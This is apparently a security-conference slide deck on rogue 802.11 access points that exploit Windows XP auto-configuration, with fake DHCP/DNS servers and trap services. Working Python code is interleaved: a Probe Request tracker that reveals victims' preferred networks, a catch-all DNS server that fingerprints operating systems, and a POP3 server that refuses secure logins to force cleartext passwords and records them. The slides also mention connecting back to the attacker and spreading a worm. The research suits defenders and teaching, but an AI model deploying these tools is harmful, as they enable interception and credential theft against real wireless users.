
“All your layer are belong to us”



  1. “All your layer are belong to us” Rogue 802.11 APs, DHCP/DNS Servers, and Fake Service Traps

  2. Agenda
  • Windows XP Wireless Auto Configuration (WZCSVC)
  • Wireless Client Attack Tool
  • Creating an ALL SSIDs network (L1)
  • Creating a virtual network (L2+)
  • Exploiting client-side application vulnerabilities (L5)
  • Demo
  • All your layer are belong to us

  3. Wireless Auto Configuration Algorithm
  • First, the client builds a list of available networks
  • It sends a broadcast Probe Request (wildcard SSID) on each channel

  4. Wireless Auto Configuration Algorithm
  • Access Points within range respond with Probe Responses

  5. Wireless Auto Configuration Algorithm
  • If Probe Responses are received for networks in the preferred networks list:
    • Connect to them in preferred networks list order
  • Otherwise, if no available network matches a preferred network:
    • Specific (directed) Probe Requests are sent for each preferred network, in case the network is “hidden” (not broadcasting its SSID)

  6. Wireless Auto Configuration Algorithm
  • If still not associated and there is an ad-hoc network in the preferred networks list, create that network and become its first node
  • Use a self-assigned (APIPA) IP address in 169.254.x.y

  7. Wireless Auto Configuration Algorithm
  • Finally, if “Automatically connect to non-preferred networks” is enabled (disabled by default), connect to networks in the order they were detected
  • Otherwise, wait for the user to select a network
  • Continue scanning for networks
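The selection order on slides 3 to 7 as a small Python model. This is an added example written for this page, not Microsoft's WZC code; the class names, the `directed_probe` hook that stands in for a directed Probe Request, and the constructed scan results are assumptions of the model. It shows why a rogue AP carrying a better-ranked preferred SSID is chosen even when the client is already in range of a real network:

```python
"""Model of the Windows XP Wireless Auto Configuration selection order.
Added illustration for this page, not Microsoft's code; data structures
and the directed_probe hook are assumptions of the model."""
from dataclasses import dataclass


@dataclass
class ScanResult:
    """One Probe Response heard during the broadcast scan."""
    ssid: str
    bssid: str
    adhoc: bool = False


@dataclass
class PreferredNetwork:
    """One entry of the Preferred Networks list, most preferred first."""
    ssid: str
    adhoc: bool = False


def select_network(probe_responses, preferred, directed_probe=lambda ssid: False,
                   connect_non_preferred=False):
    """Return the (action, ssid) the client takes after one scan.

    probe_responses: ScanResults in the order they were detected.
    preferred:       PreferredNetwork entries in preferred order.
    directed_probe:  ssid -> True if a "hidden" network answers a directed
                     Probe Request for that SSID (assumed hook).
    """
    visible = {r.ssid for r in probe_responses if r.ssid}
    # 1. A preferred network answered the broadcast probe: take the
    #    highest-ranked one, regardless of which AP was detected first.
    for p in preferred:
        if p.ssid in visible:
            return ("associate", p.ssid)
    # 2. Nothing matched: probe for each preferred SSID in case it is hidden.
    for p in preferred:
        if directed_probe(p.ssid):
            return ("associate", p.ssid)
    # 3. Still nothing: create the first preferred ad-hoc network ourselves
    #    (the node then self-assigns a 169.254.x.y address).
    for p in preferred:
        if p.adhoc:
            return ("create_adhoc", p.ssid)
    # 4. Non-preferred networks only if the user enabled that (off by default),
    #    in detection order.
    if connect_non_preferred:
        for r in probe_responses:
            if r.ssid:
                return ("associate", r.ssid)
    return ("wait", None)


def rogue_ap_outranks_real_one():
    """Constructed scenario: a rogue AP named after a better-ranked SSID wins."""
    preferred = [PreferredNetwork("MegaCorp"), PreferredNetwork("linksys")]
    real_ap = ScanResult("linksys", "00:00:00:00:00:01")
    # Coffee shop: only the real AP is around.
    before = select_network([real_ap], preferred)
    # Attacker brings up a HostAP network "MegaCorp"; it is detected later
    # than linksys, but ranks higher in the preferred list.
    rogue_ap = ScanResult("MegaCorp", "de:ad:be:ef:00:01")
    after = select_network([real_ap, rogue_ap], preferred)
    return before, after
```

The ordering in step 1 is by position in the preferred list, not by signal strength or detection order; that property is what the attacks on the following slides rely on.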

  8. Attacking Wireless Auto Configuration
  • Attacker spoofs a Disassociation frame to the victim
  • Client sends broadcast and specific Probe Requests again
  • Attacker discovers the networks in the Preferred Networks list (e.g. linksys, MegaCorp, t-mobile), since each directed Probe Request carries its SSID in the clear

  9. Attacking Wireless Auto Configuration
  • Attacker creates a network named MegaCorp with the HostAP driver

  10. Attacking Wireless Auto Configuration
  • Victim associates to the attacker’s fake network
  • Even if the preferred network was WEP-protected (XP SP 0 would associate to an open network advertising a preferred SSID)
  • Attacker can then supply the DHCP, DNS, … servers

  11. Wireless Auto Configuration Attacks
  • Attacker can join a created ad-hoc network
    • Sniff the network to discover the self-assigned IP (169.254.x.y) and attack
  • Create a more Preferred Network
    • Spoof Disassociation frames to cause clients to restart the scanning process
    • Sniff Probe Requests to discover Preferred Networks
    • Create a network with an SSID taken from a Probe Request
  • Create a stronger signal for the currently associated network
    • While associated to a network, clients send Probe Requests for that same network to look for a stronger signal
  You can be 0wned while watching a DVD on a plane!

  12. A Tool to Automate the Attack
  • Track clients by MAC address
  • Identify state: scanning/associated
  • Record preferred networks by capturing Probe Requests
  • Display signal strength of packets from the client
  • Target specific clients and create a network they will automatically associate to
  • Compromise the client and let it rejoin its original network
    • Connect back out over the Internet to the attacker
    • Launch a worm inside the corporate network
    • Etc.
  “Kismet” for wireless clients
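The core of such a tool, as an added example for this page (not the tool from the talk): parse raw 802.11 management frames, track each client by MAC, record the SSIDs it probes for (its Preferred Networks, in the order they were probed) and whether it is scanning or associated. The frames are constructed inline and carry no radiotap header; the RSSI is handed in by the caller, since in a real monitor-mode capture it would come from radiotap, which is not parsed here. Names and the frame builders are assumptions of the example.

```python
"""Probe Request tracker: clients, their Preferred Networks, and state.
Added example for this page; frames are constructed, not captured."""
import struct
from collections import OrderedDict

MGMT = 0
SUBTYPE_ASSOC_REQ = 0
SUBTYPE_PROBE_REQ = 4
TAG_SSID = 0
TAG_RATES = 1


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_tagged(params):
    """Tagged parameters: (id, len, value) triples; drops a truncated element."""
    tags, i = {}, 0
    while i + 2 <= len(params):
        tid, tlen = params[i], params[i + 1]
        if i + 2 + tlen > len(params):
            break
        tags[tid] = params[i + 2:i + 2 + tlen]
        i += 2 + tlen
    return tags


def parse_mgmt(frame):
    """(subtype, addr1, addr2, addr3, body) for a management frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != MGMT:
        return None
    subtype = (frame[0] >> 4) & 0xF
    return (subtype, mac_str(frame[4:10]), mac_str(frame[10:16]),
            mac_str(frame[16:22]), frame[24:])


def build_mgmt(subtype, da, sa, bssid, body):
    """Constructed frame: frame control, duration, 3 addresses, seq ctl, body."""
    hdr = struct.pack("<BBH", subtype << 4 | MGMT << 2, 0, 0)
    hdr += mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) + struct.pack("<H", 0)
    return hdr + body


def ssid_tag(ssid):
    s = ssid.encode()
    return bytes([TAG_SSID, len(s)]) + s


def build_probe_request(sa, ssid):
    """ssid == "" is the wildcard (broadcast) probe."""
    rates = bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    bcast = "ff:ff:ff:ff:ff:ff"
    return build_mgmt(SUBTYPE_PROBE_REQ, bcast, sa, bcast, ssid_tag(ssid) + rates)


def build_assoc_request(sa, bssid, ssid):
    fixed = struct.pack("<HH", 0x0431, 10)  # capability info, listen interval
    return build_mgmt(SUBTYPE_ASSOC_REQ, bssid, sa, bssid, fixed + ssid_tag(ssid))


class ClientTracker:
    def __init__(self):
        self.clients = OrderedDict()

    def _client(self, mac):
        return self.clients.setdefault(
            mac, {"state": "unknown", "preferred": [], "bssid": None, "rssi": None})

    def feed(self, frame, rssi=None):
        parsed = parse_mgmt(frame)
        if parsed is None:
            return None
        subtype, _addr1, sa, bssid, body = parsed
        c = self._client(sa)
        if rssi is not None:
            c["rssi"] = rssi
        if subtype == SUBTYPE_PROBE_REQ:
            ssid = parse_tagged(body).get(TAG_SSID, b"").decode(errors="replace")
            if ssid == "":
                c["state"] = "scanning"      # wildcard probe: client is hunting
            elif ssid not in c["preferred"]:
                c["preferred"].append(ssid)  # directed probe leaks a Preferred Network
            return ("probe", sa, ssid)
        if subtype == SUBTYPE_ASSOC_REQ:
            ssid = parse_tagged(body[4:]).get(TAG_SSID, b"").decode(errors="replace")
            c["state"], c["bssid"] = "associated", bssid
            return ("assoc", sa, ssid)
        return None

    def targets_for(self, ssid):
        """Clients that would auto-associate to a rogue AP named ssid."""
        return [m for m, c in self.clients.items() if ssid in c["preferred"]]
```

A directed probe for a network the client is already associated to (slide 11) does not flip its state back to scanning; only the wildcard probe does, which is the signal that a disassociation has taken effect.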

  13. L1: Creating An ALL SSIDs Network
  • Can we attack multiple clients at once?
  • Want a network that responds to Probe Requests for any SSID
  • Prism II HostAP mode handles Probe Requests in firmware and doesn’t pass them to the driver
  • Can modify the driver to accept Associations for any SSID
  • Can use a second card to sniff for Probe Requests and forge Probe Responses
  • Custom firmware would be better

  14. L2: Creating a FishNet
  • Want a network where we can observe clients in a “fishbowl” environment
  • Once victims associate to the wireless network, they will acquire a DHCP address
  • We run our own DHCP server
  • We are also the DNS server and the router

  15. FishNet Services
  • When the wireless link becomes active, client software activates and attempts to connect, reconnect, etc. without requiring user action
  • Our custom DNS server replies with our IP address for every query
  • We also run “trap” web, mail and chat services
    • Fingerprint client software versions
    • Steal credentials
    • Exploit client-side application vulnerabilities

  16. Fingerprinting FishNet Clients
  • Automatic DNS queries
    • wpad.domain -> Windows
    • _isatap -> Windows XP SP 0
    • isatap.domain -> Windows XP SP 1
    • teredo.ipv6.microsoft.com -> Windows XP SP 2
  • Automatic HTTP requests
    • windowsupdate.com, etc.
    • User-Agent string reveals OS version
  • Passive OS fingerprinting (p0f)
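The “answer everything with our IP” DNS server from slide 15 together with the query-name fingerprinting from slide 16, as an added example for this page (not the FishNet code from the talk). It parses the question of a raw DNS query, classifies the client from the name, and answers A queries with the attacker's address; other query types get an empty NOERROR answer so the client falls back to A rather than erroring out. The attacker IP, the sample names and the `serve` wrapper are assumptions of the example.

```python
"""Catch-all DNS responder with OS fingerprinting from automatic queries.
Added example for this page; sample queries are constructed."""
import socket
import struct

QTYPE_A = 1

# Automatic query names from slide 16 and the OS they indicate.
FINGERPRINTS = [
    ("teredo.ipv6.microsoft.com", "Windows XP SP2"),
    ("_isatap", "Windows XP SP0"),
    ("isatap.", "Windows XP SP1"),
    ("wpad.", "Windows"),
]


def fingerprint(qname):
    """OS guess for a query name, or None if the name is not telling."""
    n = qname.lower().rstrip(".")
    for prefix, os_name in FINGERPRINTS:
        if n == prefix.rstrip(".") or n.startswith(prefix):
            return os_name
    return None


def parse_question(pkt):
    """(txid, qname, qtype, offset past the question) from a DNS query."""
    txid, _flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, i = [], 12
    while True:
        n = pkt[i]
        i += 1
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointer in a query")
        labels.append(pkt[i:i + n].decode("ascii", errors="replace"))
        i += n
    qtype, _qclass = struct.unpack("!HH", pkt[i:i + 4])
    return txid, ".".join(labels), qtype, i + 4


def build_response(query, answer_ip):
    """Echo the question; A queries get answer_ip, others an empty answer."""
    txid, _qname, qtype, qend = parse_question(query)
    question = query[12:qend]
    if qtype != QTYPE_A:
        return struct.pack("!HHHHHH", txid, 0x8180, 1, 0, 0, 0) + question
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA set
    # Name is a pointer to the question (offset 12), type A, class IN, TTL 60.
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, 60, 4) + socket.inet_aton(answer_ip)
    return hdr + question + rr


def build_query(txid, qname, qtype=QTYPE_A):
    """Constructed client query, as a stub resolver would send it."""
    hdr = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    return hdr + name + struct.pack("!HH", qtype, 1)


def serve(answer_ip, bind="0.0.0.0", port=53):
    """UDP loop: log the fingerprint of each client and answer with answer_ip."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind((bind, port))
    while True:
        pkt, peer = s.recvfrom(512)
        try:
            _txid, qname, _qtype, _end = parse_question(pkt)
        except (ValueError, IndexError, struct.error):
            continue
        print(f"{peer[0]} asked {qname!r} -> {fingerprint(qname)}")
        s.sendto(build_response(pkt, answer_ip), peer)
```

The DHCP server hands out this host as the resolver, so every name the client software looks up on link-up lands here; the name itself is the fingerprint, before any application traffic is seen.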

  17. L5: Exploiting FishNet Clients
  • Fake services steal credentials
    • Mail and chat protocols (IMAP, POP3, AIM, YIM, MSN)
    • Reject authentication attempts that use non-cleartext commands
    • Many clients automatically fall back to cleartext when non-cleartext authentication is not supported
  • Attack VPN clients…
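A POP3 “trap” service of the kind described above, as an added example for this page (not the talk's FishNet code). It advertises only USER/PASS in CAPA, answers -ERR to APOP, AUTH and STLS so that a client which falls back sends its password in the clear, records the credentials, and then shows an empty mailbox so the client has nothing to complain about. The TCP wrapper, port, and the constructed client transcript are assumptions of the example; the same pattern applies to IMAP with LOGIN versus AUTHENTICATE.

```python
"""POP3 credential trap: refuse every non-cleartext mechanism, log USER/PASS.
Added example for this page; the client transcript is constructed."""
import socketserver


class Pop3Trap:
    """Protocol state for one session; handle_line returns (reply, close)."""

    def __init__(self, captured):
        self.captured = captured   # shared list of (peer, user, password)
        self.user = None
        self.peer = None

    def greeting(self):
        return "+OK POP3 server ready\r\n"

    def handle_line(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "CAPA":
            # No SASL, no STLS in the capability list: nothing secure to pick.
            return "+OK\r\nUSER\r\nUIDL\r\n.\r\n", False
        if verb in ("APOP", "AUTH", "STLS"):
            # Reject digest, SASL and TLS so the client retries with USER/PASS.
            return "-ERR command not supported\r\n", False
        if verb == "USER":
            self.user = arg
            return "+OK\r\n", False
        if verb == "PASS":
            if self.user is None:
                return "-ERR USER first\r\n", False
            self.captured.append((self.peer, self.user, arg))
            return "+OK logged in\r\n", False
        if verb == "STAT":
            return "+OK 0 0\r\n", False       # empty mailbox keeps the client quiet
        if verb in ("LIST", "UIDL"):
            return "+OK\r\n.\r\n", False
        if verb == "QUIT":
            return "+OK bye\r\n", True
        return "-ERR unknown command\r\n", False


CAPTURED = []


class Pop3Handler(socketserver.StreamRequestHandler):
    def handle(self):
        trap = Pop3Trap(CAPTURED)
        trap.peer = self.client_address[0]
        self.wfile.write(trap.greeting().encode())
        while True:
            raw = self.rfile.readline()
            if not raw:
                break
            reply, close = trap.handle_line(raw.decode("latin-1"))
            self.wfile.write(reply.encode())
            if close:
                break


def run_trap(bind="0.0.0.0", port=110):
    """Serve the trap on the FishNet; DNS already points every mail host here."""
    with socketserver.ThreadingTCPServer((bind, port), Pop3Handler) as srv:
        srv.serve_forever()


def simulate_fallback_client():
    """Constructed transcript: client tries CRAM-MD5, is refused, falls back."""
    log = []
    trap = Pop3Trap(log)
    trap.peer = "192.168.0.10"
    commands = ["CAPA", "AUTH CRAM-MD5", "USER bob", "PASS s3cret", "STAT", "QUIT"]
    replies = [trap.handle_line(c)[0] for c in commands]
    return replies, log
```

The client-side defence is the mirror image: a mail client configured to require TLS or a specific SASL mechanism will not fall back, and a trap like this then captures nothing.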

  18. Client-Side Application Vulnerabilities
  Recent client-side vulnerabilities:
  • Microsoft JPG Processing (GDI+)
  • Mozilla POP3 Heap Overflows
  • GDK Pixbuf XPM Vulnerabilities
  • …
  Exploits can make use of the fingerprinting info

  19. DEMO
